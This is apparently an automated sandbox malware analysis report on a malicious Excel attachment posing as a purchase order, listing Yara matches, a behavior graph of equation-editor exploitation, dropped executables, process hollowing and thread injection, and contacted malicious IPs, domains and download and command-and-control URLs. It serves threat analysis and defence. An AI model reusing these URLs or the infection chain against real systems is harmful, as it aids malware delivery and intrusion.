Source: Yara match File source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 552838 Sample: RFQ_Order_PO_TAE5203E.xlsx Startdate: 13/01/2022 Architecture: WINDOWS Score: 100 49 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->49 51 Multi AV Scanner detection for domain / URL 2->51 53 Found malware configuration 2->53 55 15 other signatures 2->55 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 33 21 2->15         started        process3 dnsIp4 47 209.141.37.110, 49167, 80 PONYNETUS United States 10->47 35 C:\Users\user\AppData\Local\...\hnmy[1].exe, PE32 10->35 dropped 37 C:\Users\Public\vbc.exe, PE32 10->37 dropped 75 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->75 17 vbc.exe 1 10->17         started        39 C:\Users\...\~$RFQ_Order_PO_TAE5203E.xlsx, data 15->39 dropped file5 signatures6 process7 file8 33 C:\Users\user\AppData\Local\...\Cielert.tmp, PE32 17->33 dropped 57 Antivirus detection for dropped file 17->57 59 Multi AV Scanner detection for dropped file 17->59 61 Machine Learning detection for dropped file 17->61 63 3 other signatures 17->63 21 vbc.exe 17->21         started        signatures9 process10 signatures11 65 Modifies the context of a thread in another process (thread injection) 21->65 67 Maps a DLL or memory area into another process 21->67 69 Sample uses process hollowing technique 21->69 71 Queues an APC in another process (thread injection) 21->71 24 explorer.exe 21->24 injected process12 dnsIp13 41 www.aloebiotics.com 64.190.62.111, 49169, 80 NBS11696US United States 24->41 43 www.sjljtzsls.com 163.197.71.43, 49170, 80 CITISCLOUD-AS-APCITISCLOUDGROUPLIMITEDHK South Africa 24->43 45 www.mediafyagency.com 24->45 73 System process connects to network (likely due to code injection or exploit) 24->73 28 msiexec.exe 24->28         started        signatures14 process15 signatures16 77 Modifies the context of a thread in another process (thread injection) 28->77 79 Maps a DLL or memory area into another process 28->79 31 cmd.exe 28->31         started        process17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
209.141.37.110
 unknown United States
53667 PONYNETUS true
64.190.62.111
 www.aloebiotics.com United States
11696 NBS11696US true
163.197.71.43
 www.sjljtzsls.com South Africa
140107 CITISCLOUD-AS-APCITISCLOUDGROUPLIMITEDHK true

Contacted Domains

Name IP Active
www.aloebiotics.com 64.190.62.111 true
www.sjljtzsls.com 163.197.71.43 true
www.mediafyagency.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://209.141.37.110/hnmy.exe true
  • 13%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://www.aloebiotics.com/b80i/?XXAT9NU=u8CFGDbLa+paDYPUt2HIfZvLGaLNzu7WkG1ejV9QOUI0TwLOmLGNbUmrlgsvnY/sa5UfOA==&bFQL=2dJLx4-Hc4v true
  • Avira URL Cloud: malware
 unknown
www.dreamschools.online/b80i/ true
  • Avira URL Cloud: phishing
 low
http://www.sjljtzsls.com/b80i/?XXAT9NU=S1GZrcUjP6Mqu1rkaE68XUwdav2ZAuLdhfc3NoUcKUpIPYlLOeb3MkcjdHuyJHfoxw3F9Q==&bFQL=2dJLx4-Hc4v true
  • Avira URL Cloud: malware
 unknown